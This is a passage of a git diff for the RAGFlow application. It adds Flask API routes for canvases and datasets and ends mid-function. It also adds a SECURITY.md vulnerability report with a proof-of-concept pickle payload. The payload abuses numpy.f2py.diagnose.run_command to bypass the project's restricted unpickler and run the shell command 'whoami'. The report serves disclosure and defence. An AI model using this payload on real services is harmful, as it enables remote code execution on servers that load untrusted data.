SECURITY.md
Normal file
@ -0,0 +1,74 @@
|
||||
# Security Policy
|
||||
|
||||
## Supported Versions
|
||||
|
||||
Use this section to tell people about which versions of your project are
|
||||
currently being supported with security updates.
|
||||
|
||||
| Version | Supported |
|
||||
| ------- | ------------------ |
|
||||
| <=0.7.0 | :white_check_mark: |
|
||||
|
||||
## Reporting a Vulnerability
|
||||
|
||||
### Branch name
|
||||
|
||||
main
|
||||
|
||||
### Actual behavior
|
||||
|
||||
The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
|
||||
The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
|
||||
|
||||
|
||||
### Steps to reproduce
|
||||
|
||||
|
||||
**ragflow_patch.py**
|
||||
|
||||
```py
|
||||
import builtins
|
||||
import io
|
||||
import pickle
|
||||
|
||||
safe_module = {
|
||||
'numpy',
|
||||
'rag_flow'
|
||||
}
|
||||
|
||||
|
||||
class RestrictedUnpickler(pickle.Unpickler):
|
||||
def find_class(self, module, name):
|
||||
import importlib
|
||||
if module.split('.')[0] in safe_module:
|
||||
_module = importlib.import_module(module)
|
||||
return getattr(_module, name)
|
||||
# Forbid everything else.
|
||||
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
|
||||
(module, name))
|
||||
|
||||
|
||||
def restricted_loads(src):
|
||||
"""Helper function analogous to pickle.loads()."""
|
||||
return RestrictedUnpickler(io.BytesIO(src)).load()
|
||||
```
|
||||
Then, **PoC.py**
|
||||
```py
|
||||
import pickle
|
||||
from ragflow_patch import restricted_loads
|
||||
class Exploit:
|
||||
def __reduce__(self):
|
||||
import numpy.f2py.diagnose
|
||||
return numpy.f2py.diagnose.run_command, ('whoami', )
|
||||
|
||||
Payload=pickle.dumps(Exploit())
|
||||
restricted_loads(Payload)
|
||||
```
|
||||
**Result**
|
||||

|
||||
|
||||
|
||||
### Additional information
|
||||
|
||||
#### How to prevent?
|
||||
Strictly filter the module and name before calling with getattr function.
|
||||
@ -63,12 +63,17 @@ login_manager.init_app(app)
|
||||
|
||||
|
||||
def search_pages_path(pages_dir):
|
||||
return [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
|
||||
app_path_list = [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
|
||||
api_path_list = [path for path in pages_dir.glob('*_api.py') if not path.name.startswith('.')]
|
||||
app_path_list.extend(api_path_list)
|
||||
return app_path_list
|
||||
|
||||
|
||||
def register_page(page_path):
|
||||
page_name = page_path.stem.rstrip('_app')
|
||||
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name, ))
|
||||
path = f'{page_path}'
|
||||
|
||||
page_name = page_path.stem.rstrip('_api') if "_api" in path else page_path.stem.rstrip('_app')
|
||||
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name,))
|
||||
|
||||
spec = spec_from_file_location(module_name, page_path)
|
||||
page = module_from_spec(spec)
|
||||
@ -76,9 +81,8 @@ def register_page(page_path):
|
||||
page.manager = Blueprint(page_name, module_name)
|
||||
sys.modules[module_name] = page
|
||||
spec.loader.exec_module(page)
|
||||
|
||||
page_name = getattr(page, 'page_name', page_name)
|
||||
url_prefix = f'/{API_VERSION}/{page_name}'
|
||||
url_prefix = f'/api/{API_VERSION}/{page_name}' if "_api" in path else f'/{API_VERSION}/{page_name}'
|
||||
|
||||
app.register_blueprint(page.manager, url_prefix=url_prefix)
|
||||
return url_prefix
|
||||
@ -86,7 +90,7 @@ def register_page(page_path):
|
||||
|
||||
pages_dir = [
|
||||
Path(__file__).parent,
|
||||
Path(__file__).parent.parent / 'api' / 'apps',
|
||||
Path(__file__).parent.parent / 'api' / 'apps', # FIXME: ragflow/api/api/apps, can be remove?
|
||||
]
|
||||
|
||||
client_urls_prefix = [
|
||||
|
||||
@ -198,15 +198,18 @@ def completion():
|
||||
else: conv.reference[-1] = ans["reference"]
|
||||
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
|
||||
|
||||
def rename_field(ans):
|
||||
for chunk_i in ans['reference'].get('chunks', []):
|
||||
chunk_i['doc_name'] = chunk_i['docnm_kwd']
|
||||
chunk_i.pop('docnm_kwd')
|
||||
|
||||
def stream():
|
||||
nonlocal dia, msg, req, conv
|
||||
try:
|
||||
for ans in chat(dia, msg, True, **req):
|
||||
fillin_conv(ans)
|
||||
for chunk_i in ans['reference'].get('chunks', []):
|
||||
chunk_i['doc_name'] = chunk_i['docnm_kwd']
|
||||
chunk_i.pop('docnm_kwd')
|
||||
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
rename_field(ans)
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
API4ConversationService.append_message(conv.id, conv.to_dict())
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
@ -375,19 +378,19 @@ def list_chunks():
|
||||
return get_json_result(
|
||||
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
form_data = request.form
|
||||
req = request.json
|
||||
|
||||
try:
|
||||
if "doc_name" in form_data.keys():
|
||||
tenant_id = DocumentService.get_tenant_id_by_name(form_data['doc_name'])
|
||||
doc_id = DocumentService.get_doc_id_by_doc_name(form_data['doc_name'])
|
||||
if "doc_name" in req.keys():
|
||||
tenant_id = DocumentService.get_tenant_id_by_name(req['doc_name'])
|
||||
doc_id = DocumentService.get_doc_id_by_doc_name(req['doc_name'])
|
||||
|
||||
elif "doc_id" in form_data.keys():
|
||||
tenant_id = DocumentService.get_tenant_id(form_data['doc_id'])
|
||||
doc_id = form_data['doc_id']
|
||||
elif "doc_id" in req.keys():
|
||||
tenant_id = DocumentService.get_tenant_id(req['doc_id'])
|
||||
doc_id = req['doc_id']
|
||||
else:
|
||||
return get_json_result(
|
||||
data=False,retmsg="Can't find doc_name or doc_id"
|
||||
data=False, retmsg="Can't find doc_name or doc_id"
|
||||
)
|
||||
|
||||
res = retrievaler.chunk_list(doc_id=doc_id, tenant_id=tenant_id)
|
||||
@ -414,8 +417,9 @@ def list_kb_docs():
|
||||
return get_json_result(
|
||||
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
req = request.json
|
||||
tenant_id = objs[0].tenant_id
|
||||
kb_name = request.form.get("kb_name").strip()
|
||||
kb_name = req.get("kb_name", "").strip()
|
||||
|
||||
try:
|
||||
e, kb = KnowledgebaseService.get_by_name(kb_name, tenant_id)
|
||||
@ -427,11 +431,11 @@ def list_kb_docs():
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
page_number = int(request.form.get("page", 1))
|
||||
items_per_page = int(request.form.get("page_size", 15))
|
||||
orderby = request.form.get("orderby", "create_time")
|
||||
desc = request.form.get("desc", True)
|
||||
keywords = request.form.get("keywords", "")
|
||||
page_number = int(req.get("page", 1))
|
||||
items_per_page = int(req.get("page_size", 15))
|
||||
orderby = req.get("orderby", "create_time")
|
||||
desc = req.get("desc", True)
|
||||
keywords = req.get("keywords", "")
|
||||
|
||||
try:
|
||||
docs, tol = DocumentService.get_by_kb_id(
|
||||
@ -553,23 +557,24 @@ def completion_faq():
|
||||
"content": ""
|
||||
}
|
||||
]
|
||||
for ans in chat(dia, msg, stream=False, **req):
|
||||
# answer = ans
|
||||
data[0]["content"] += re.sub(r'##\d\$\$', '', ans["answer"])
|
||||
fillin_conv(ans)
|
||||
API4ConversationService.append_message(conv.id, conv.to_dict())
|
||||
|
||||
chunk_idxs = [int(match[2]) for match in re.findall(r'##\d\$\$', ans["answer"])]
|
||||
for chunk_idx in chunk_idxs[:1]:
|
||||
if ans["reference"]["chunks"][chunk_idx]["img_id"]:
|
||||
try:
|
||||
bkt, nm = ans["reference"]["chunks"][chunk_idx]["img_id"].split("-")
|
||||
response = MINIO.get(bkt, nm)
|
||||
data_type_picture["url"] = base64.b64encode(response).decode('utf-8')
|
||||
data.append(data_type_picture)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
ans = ""
|
||||
for a in chat(dia, msg, stream=False, **req):
|
||||
ans = a
|
||||
break
|
||||
data[0]["content"] += re.sub(r'##\d\$\$', '', ans["answer"])
|
||||
fillin_conv(ans)
|
||||
API4ConversationService.append_message(conv.id, conv.to_dict())
|
||||
|
||||
chunk_idxs = [int(match[2]) for match in re.findall(r'##\d\$\$', ans["answer"])]
|
||||
for chunk_idx in chunk_idxs[:1]:
|
||||
if ans["reference"]["chunks"][chunk_idx]["img_id"]:
|
||||
try:
|
||||
bkt, nm = ans["reference"]["chunks"][chunk_idx]["img_id"].split("-")
|
||||
response = MINIO.get(bkt, nm)
|
||||
data_type_picture["url"] = base64.b64encode(response).decode('utf-8')
|
||||
data.append(data_type_picture)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
response = {"code": 200, "msg": "success", "data": data}
|
||||
return response
|
||||
|
||||
162
api/apps/canvas_app.py
Normal file
162
api/apps/canvas_app.py
Normal file
@ -0,0 +1,162 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
from functools import partial
|
||||
|
||||
from flask import request, Response
|
||||
from flask_login import login_required, current_user
|
||||
|
||||
from api.db.db_models import UserCanvas
|
||||
from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result, server_error_response, validate_request
|
||||
from graph.canvas import Canvas
|
||||
|
||||
|
||||
@manager.route('/templates', methods=['GET'])
|
||||
@login_required
|
||||
def templates():
|
||||
return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def canvas_list():
|
||||
return get_json_result(data=sorted([c.to_dict() for c in \
|
||||
UserCanvasService.query(user_id=current_user.id)], key=lambda x: x["update_time"]*-1)
|
||||
)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@validate_request("canvas_ids")
|
||||
@login_required
|
||||
def rm():
|
||||
for i in request.json["canvas_ids"]:
|
||||
UserCanvasService.delete_by_id(i)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@validate_request("dsl", "title")
|
||||
@login_required
|
||||
def save():
|
||||
req = request.json
|
||||
req["user_id"] = current_user.id
|
||||
if not isinstance(req["dsl"], str): req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)
|
||||
|
||||
req["dsl"] = json.loads(req["dsl"])
|
||||
if "id" not in req:
|
||||
if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
|
||||
return server_error_response(ValueError("Duplicated title."))
|
||||
req["id"] = get_uuid()
|
||||
if not UserCanvasService.save(**req):
|
||||
return server_error_response("Fail to save canvas.")
|
||||
else:
|
||||
UserCanvasService.update_by_id(req["id"], req)
|
||||
|
||||
return get_json_result(data=req)
|
||||
|
||||
|
||||
@manager.route('/get/<canvas_id>', methods=['GET'])
|
||||
@login_required
|
||||
def get(canvas_id):
|
||||
e, c = UserCanvasService.get_by_id(canvas_id)
|
||||
if not e:
|
||||
return server_error_response("canvas not found.")
|
||||
return get_json_result(data=c.to_dict())
|
||||
|
||||
|
||||
@manager.route('/completion', methods=['POST'])
|
||||
@validate_request("id")
|
||||
@login_required
|
||||
def run():
|
||||
req = request.json
|
||||
stream = req.get("stream", True)
|
||||
e, cvs = UserCanvasService.get_by_id(req["id"])
|
||||
if not e:
|
||||
return server_error_response("canvas not found.")
|
||||
|
||||
if not isinstance(cvs.dsl, str):
|
||||
cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)
|
||||
|
||||
final_ans = {"reference": [], "content": ""}
|
||||
try:
|
||||
canvas = Canvas(cvs.dsl, current_user.id)
|
||||
if "message" in req:
|
||||
canvas.messages.append({"role": "user", "content": req["message"]})
|
||||
canvas.add_user_input(req["message"])
|
||||
answer = canvas.run(stream=stream)
|
||||
print(canvas)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
assert answer, "Nothing. Is it over?"
|
||||
|
||||
if stream:
|
||||
assert isinstance(answer, partial)
|
||||
|
||||
def sse():
|
||||
nonlocal answer, cvs
|
||||
try:
|
||||
for ans in answer():
|
||||
for k in ans.keys():
|
||||
final_ans[k] = ans[k]
|
||||
ans = {"answer": ans["content"], "reference": ans.get("reference", [])}
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
|
||||
if final_ans.get("reference"):
|
||||
canvas.reference.append(final_ans["reference"])
|
||||
cvs.dsl = json.loads(str(canvas))
|
||||
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: " + str(e), "reference": []}},
|
||||
ensure_ascii=False) + "\n\n"
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
resp = Response(sse(), mimetype="text/event-stream")
|
||||
resp.headers.add_header("Cache-control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
return resp
|
||||
|
||||
canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
|
||||
if final_ans.get("reference"):
|
||||
canvas.reference.append(final_ans["reference"])
|
||||
cvs.dsl = json.loads(str(canvas))
|
||||
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
|
||||
return get_json_result(data=req["dsl"])
|
||||
|
||||
|
||||
@manager.route('/reset', methods=['POST'])
|
||||
@validate_request("id")
|
||||
@login_required
|
||||
def reset():
|
||||
req = request.json
|
||||
try:
|
||||
e, user_canvas = UserCanvasService.get_by_id(req["id"])
|
||||
if not e:
|
||||
return server_error_response("canvas not found.")
|
||||
|
||||
canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
|
||||
canvas.reset()
|
||||
req["dsl"] = json.loads(str(canvas))
|
||||
UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
|
||||
return get_json_result(data=req["dsl"])
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
@ -20,7 +20,7 @@ from flask_login import login_required, current_user
|
||||
from elasticsearch_dsl import Q
|
||||
|
||||
from rag.app.qa import rmPrefix, beAdoc
|
||||
from rag.nlp import search, rag_tokenizer
|
||||
from rag.nlp import search, rag_tokenizer, keyword_extraction
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils import rmSpace
|
||||
from api.db import LLMType, ParserType
|
||||
@ -136,8 +136,11 @@ def set():
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
embd_id = DocumentService.get_embd_id(req["doc_id"])
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
tenant_id, LLMType.EMBEDDING.value)
|
||||
tenant_id, LLMType.EMBEDDING.value, embd_id)
|
||||
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
@ -221,9 +224,11 @@ def create():
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
|
||||
embd_id = DocumentService.get_embd_id(req["doc_id"])
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
tenant_id, LLMType.EMBEDDING.value)
|
||||
tenant_id, LLMType.EMBEDDING.value, embd_id)
|
||||
|
||||
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
|
||||
DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
|
||||
v = 0.1 * v[0] + 0.9 * v[1]
|
||||
@ -263,6 +268,10 @@ def retrieval_test():
|
||||
rerank_mdl = TenantLLMService.model_instance(
|
||||
kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])
|
||||
|
||||
if req.get("keyword", False):
|
||||
chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
|
||||
question += keyword_extraction(chat_mdl, question)
|
||||
|
||||
ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size,
|
||||
similarity_threshold, vector_similarity_weight, top,
|
||||
doc_ids, rerank_mdl=rerank_mdl)
|
||||
|
||||
@ -13,7 +13,8 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from flask import request, Response, jsonify
|
||||
from copy import deepcopy
|
||||
from flask import request, Response
|
||||
from flask_login import login_required
|
||||
from api.db.services.dialog_service import DialogService, ConversationService, chat
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
@ -121,7 +122,7 @@ def completion():
|
||||
e, conv = ConversationService.get_by_id(req["conversation_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
conv.message.append(msg[-1])
|
||||
conv.message.append(deepcopy(msg[-1]))
|
||||
e, dia = DialogService.get_by_id(conv.dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
|
||||
615
api/apps/dataset_api.py
Normal file
615
api/apps/dataset_api.py
Normal file
@ -0,0 +1,615 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
import os
|
||||
import pathlib
|
||||
import re
|
||||
import warnings
|
||||
from io import BytesIO
|
||||
|
||||
from flask import request, send_file
|
||||
from flask_login import login_required, current_user
|
||||
from httpx import HTTPError
|
||||
from minio import S3Error
|
||||
|
||||
from api.contants import NAME_LENGTH_LIMIT
|
||||
from api.db import FileType, ParserType, FileSource
|
||||
from api.db import StatusEnum
|
||||
from api.db.db_models import File
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.user_service import TenantService
|
||||
from api.settings import RetCode
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import construct_json_result, construct_error_response
|
||||
from api.utils.api_utils import construct_result, validate_request
|
||||
from api.utils.file_utils import filename_type, thumbnail
|
||||
from rag.utils.minio_conn import MINIO
|
||||
|
||||
MAXIMUM_OF_UPLOADING_FILES = 256
|
||||
|
||||
# ------------------------------ create a dataset ---------------------------------------
|
||||
|
||||
@manager.route("/", methods=["POST"])
|
||||
@login_required # use login
|
||||
@validate_request("name") # check name key
|
||||
def create_dataset():
|
||||
# Check if Authorization header is present
|
||||
authorization_token = request.headers.get("Authorization")
|
||||
if not authorization_token:
|
||||
return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Authorization header is missing.")
|
||||
|
||||
# TODO: Login or API key
|
||||
# objs = APIToken.query(token=authorization_token)
|
||||
#
|
||||
# # Authorization error
|
||||
# if not objs:
|
||||
# return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Token is invalid.")
|
||||
#
|
||||
# tenant_id = objs[0].tenant_id
|
||||
|
||||
tenant_id = current_user.id
|
||||
request_body = request.json
|
||||
|
||||
# In case that there's no name
|
||||
if "name" not in request_body:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Expected 'name' field in request body")
|
||||
|
||||
dataset_name = request_body["name"]
|
||||
|
||||
# empty dataset_name
|
||||
if not dataset_name:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Empty dataset name")
|
||||
|
||||
# In case that there's space in the head or the tail
|
||||
dataset_name = dataset_name.strip()
|
||||
|
||||
# In case that the length of the name exceeds the limit
|
||||
dataset_name_length = len(dataset_name)
|
||||
if dataset_name_length > NAME_LENGTH_LIMIT:
|
||||
return construct_json_result(
|
||||
code=RetCode.DATA_ERROR,
|
||||
message=f"Dataset name: {dataset_name} with length {dataset_name_length} exceeds {NAME_LENGTH_LIMIT}!")
|
||||
|
||||
# In case that there are other fields in the data-binary
|
||||
if len(request_body.keys()) > 1:
|
||||
name_list = []
|
||||
for key_name in request_body.keys():
|
||||
if key_name != "name":
|
||||
name_list.append(key_name)
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"fields: {name_list}, are not allowed in request body.")
|
||||
|
||||
# If there is a duplicate name, it will modify it to make it unique
|
||||
request_body["name"] = duplicate_name(
|
||||
KnowledgebaseService.query,
|
||||
name=dataset_name,
|
||||
tenant_id=tenant_id,
|
||||
status=StatusEnum.VALID.value)
|
||||
try:
|
||||
request_body["id"] = get_uuid()
|
||||
request_body["tenant_id"] = tenant_id
|
||||
request_body["created_by"] = tenant_id
|
||||
exist, t = TenantService.get_by_id(tenant_id)
|
||||
if not exist:
|
||||
return construct_result(code=RetCode.AUTHENTICATION_ERROR, message="Tenant not found.")
|
||||
request_body["embd_id"] = t.embd_id
|
||||
if not KnowledgebaseService.save(**request_body):
|
||||
# failed to create new dataset
|
||||
return construct_result()
|
||||
return construct_json_result(code=RetCode.SUCCESS,
|
||||
data={"dataset_name": request_body["name"], "dataset_id": request_body["id"]})
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# -----------------------------list datasets-------------------------------------------------------
|
||||
|
||||
@manager.route("/", methods=["GET"])
|
||||
@login_required
|
||||
def list_datasets():
|
||||
offset = request.args.get("offset", 0)
|
||||
count = request.args.get("count", -1)
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
|
||||
datasets = KnowledgebaseService.get_by_tenant_ids_by_offset(
|
||||
[m["tenant_id"] for m in tenants], current_user.id, int(offset), int(count), orderby, desc)
|
||||
return construct_json_result(data=datasets, code=RetCode.SUCCESS, message=f"List datasets successfully!")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
except HTTPError as http_err:
|
||||
return construct_json_result(http_err)
|
||||
|
||||
# ---------------------------------delete a dataset ----------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["DELETE"])
|
||||
@login_required
|
||||
def remove_dataset(dataset_id):
|
||||
try:
|
||||
datasets = KnowledgebaseService.query(created_by=current_user.id, id=dataset_id)
|
||||
|
||||
# according to the id, searching for the dataset
|
||||
if not datasets:
|
||||
return construct_json_result(message=f"The dataset cannot be found for your current account.",
|
||||
code=RetCode.OPERATING_ERROR)
|
||||
|
||||
# Iterating the documents inside the dataset
|
||||
for doc in DocumentService.query(kb_id=dataset_id):
|
||||
if not DocumentService.remove_document(doc, datasets[0].tenant_id):
|
||||
# the process of deleting failed
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="There was an error during the document removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# delete the other files
|
||||
f2d = File2DocumentService.get_by_document_id(doc.id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc.id)
|
||||
|
||||
# delete the dataset
|
||||
if not KnowledgebaseService.delete_by_id(dataset_id):
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="There was an error during the dataset removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# success
|
||||
return construct_json_result(code=RetCode.SUCCESS, message=f"Remove dataset: {dataset_id} successfully")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# ------------------------------ get details of a dataset ----------------------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["GET"])
|
||||
@login_required
|
||||
def get_dataset(dataset_id):
|
||||
try:
|
||||
dataset = KnowledgebaseService.get_detail(dataset_id)
|
||||
if not dataset:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Can't find this dataset!")
|
||||
return construct_json_result(data=dataset, code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_json_result(e)
|
||||
|
||||
# ------------------------------ update a dataset --------------------------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["PUT"])
|
||||
@login_required
|
||||
def update_dataset(dataset_id):
|
||||
req = request.json
|
||||
try:
|
||||
# the request cannot be empty
|
||||
if not req:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Please input at least one parameter that "
|
||||
"you want to update!")
|
||||
# check whether the dataset can be found
|
||||
if not KnowledgebaseService.query(created_by=current_user.id, id=dataset_id):
|
||||
return construct_json_result(message=f"Only the owner of knowledgebase is authorized for this operation!",
|
||||
code=RetCode.OPERATING_ERROR)
|
||||
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
# check whether there is this dataset
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="This dataset cannot be found!")
|
||||
|
||||
if "name" in req:
|
||||
name = req["name"].strip()
|
||||
# check whether there is duplicate name
|
||||
if name.lower() != dataset.name.lower() \
|
||||
and len(KnowledgebaseService.query(name=name, tenant_id=current_user.id,
|
||||
status=StatusEnum.VALID.value)) > 1:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"The name: {name.lower()} is already used by other "
|
||||
f"datasets. Please choose a different name.")
|
||||
|
||||
dataset_updating_data = {}
|
||||
chunk_num = req.get("chunk_num")
|
||||
# modify the value of 11 parameters
|
||||
|
||||
# 2 parameters: embedding id and chunk method
|
||||
# only if chunk_num is 0, the user can update the embedding id
|
||||
if req.get("embedding_model_id"):
|
||||
if chunk_num == 0:
|
||||
dataset_updating_data["embd_id"] = req["embedding_model_id"]
|
||||
else:
|
||||
construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document in this "
|
||||
"dataset, so you cannot change the embedding "
|
||||
"model.")
|
||||
# only if chunk_num is 0, the user can update the chunk_method
|
||||
if req.get("chunk_method"):
|
||||
if chunk_num == 0:
|
||||
dataset_updating_data['parser_id'] = req["chunk_method"]
|
||||
else:
|
||||
construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document "
|
||||
"in this dataset, so you cannot "
|
||||
"change the chunk method.")
|
||||
# convert the photo parameter to avatar
|
||||
if req.get("photo"):
|
||||
dataset_updating_data["avatar"] = req["photo"]
|
||||
|
||||
# layout_recognize
|
||||
if "layout_recognize" in req:
|
||||
if "parser_config" not in dataset_updating_data:
|
||||
dataset_updating_data['parser_config'] = {}
|
||||
dataset_updating_data['parser_config']['layout_recognize'] = req['layout_recognize']
|
||||
|
||||
# TODO: updating use_raptor needs to construct a class
|
||||
|
||||
# 6 parameters
|
||||
for key in ["name", "language", "description", "permission", "id", "token_num"]:
|
||||
if key in req:
|
||||
dataset_updating_data[key] = req.get(key)
|
||||
|
||||
# update
|
||||
if not KnowledgebaseService.update_by_id(dataset.id, dataset_updating_data):
|
||||
return construct_json_result(code=RetCode.OPERATING_ERROR, message="Failed to update! "
|
||||
"Please check the status of RAGFlow "
|
||||
"server and try again!")
|
||||
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset.id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Failed to get the dataset "
|
||||
"using the dataset ID.")
|
||||
|
||||
return construct_json_result(data=dataset.to_json(), code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# --------------------------------content management ----------------------------------------------
|
||||
|
||||
# ----------------------------upload files-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/", methods=["POST"])
|
||||
@login_required
|
||||
def upload_documents(dataset_id):
|
||||
# no files
|
||||
if not request.files:
|
||||
return construct_json_result(
|
||||
message="There is no file!", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# the number of uploading files exceeds the limit
|
||||
file_objs = request.files.getlist("file")
|
||||
num_file_objs = len(file_objs)
|
||||
|
||||
if num_file_objs > MAXIMUM_OF_UPLOADING_FILES:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"You try to upload {num_file_objs} files, "
|
||||
